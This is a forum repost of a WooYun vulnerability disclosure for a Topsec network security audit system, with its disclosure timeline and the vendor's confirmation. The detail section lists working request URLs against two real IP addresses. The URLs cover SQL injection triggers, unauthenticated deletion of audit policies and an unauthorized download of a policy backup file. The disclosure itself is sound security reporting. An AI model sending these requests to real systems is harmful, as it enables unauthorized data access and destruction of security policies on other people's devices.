中神通公司技术论坛 - Powered by Discuz! Board

标题: 天融信网络卫士安全审计系统多处越权/信息泄露/未授权文件下载 [打印本页]

作者: linda 时间: 2016-1-8 10:43 标题: 天融信网络卫士安全审计系统多处越权/信息泄露/未授权文件下载

漏洞概要
缺陷编号：       WooYun-2015-135532
漏洞标题：       天融信网络卫士安全审计系统多处越权/信息泄露/未授权文件下载
相关厂商：       天融信
漏洞作者：       路人甲
提交时间：       2015-08-20 16:13
公开时间：       2015-11-18 17:10
漏洞类型：       设计不当
危害等级：       高
自评Rank：       15
漏洞状态：厂商已经确认
漏洞来源：       http://www.wooyun.org
Tags标签：无

漏洞详情披露状态：
2015-08-20：       细节已通知厂商并且等待厂商处理中
2015-08-20：       厂商已经确认，细节仅向厂商公开
2015-08-23：       细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航）
2015-10-14：       细节向核心白帽子及相关领域专家公开
2015-10-24：       细节向普通白帽子公开
2015-11-03：       细节向实习白帽子公开
2015-11-18：       细节向公众公开

简要描述：天融信网络卫士安全审计系统多处越权/信息泄露/未授权文件下载
详细说明：漏洞参考：

WooYun: 天融信某审计系统无需登录可添加任意管理员&未授权下载日志(附poc)

http://211.137.103.100:8080/

https://218.64.214.94

拿其中一个举例子：

sql报错：

http://211.137.103.100:8080/policy/cap/delete.php?returnfile=timegrouptable.php&TABLE=timegroup&deletename=tes%27&name=timegroupname

http://211.137.103.100:8080/policy/kw/delkeywd.php?kwtypename=cccccc%27

未授权文件下载：

http://211.137.103.100:8080/policy/manager/policy_bak.xls

事实上审计策略底下所有的删除操作都是未授权的

在点击看看其他几个：

http://211.137.103.100:8080/policy/alert/delete.php?returnfile=alertpolicymanage.php&TABLE=alertpolicy&deletename=cccccccc&name=policyname

http://211.137.103.100:8080/policy/cap/delete.php?returnfile=ipgrouptable.php&TABLE=ipgroup&deletename=any%27&name=ipgroupname

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应
厂商回应：
危害等级：中
漏洞Rank：7
确认时间：2015-08-20 17:09
厂商回复：漏洞已经确认，正在抓紧抢修中。。。
最新状态：暂无
原文：http://www.wooyun.org/bugs/wooyun-2015-0135532

[ 本帖最后由 linda 于 2016-2-15 11:00 编辑 ]

欢迎光临中神通公司技术论坛 (http://trustcomputing.com.cn/bbs/)